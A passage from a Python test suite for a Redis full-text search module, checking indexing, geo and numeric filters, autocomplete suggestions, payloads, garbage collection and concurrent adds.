hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
# Calling a stem directly works even with VERBATIM.
# You need to use the + prefix escaped
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - shuold yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
# scores should return on WITHSCORES
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores beause they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevent for fork gc cause its not cleaning the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
# gc is random so we need to do it long enough times for it to work
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try add hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
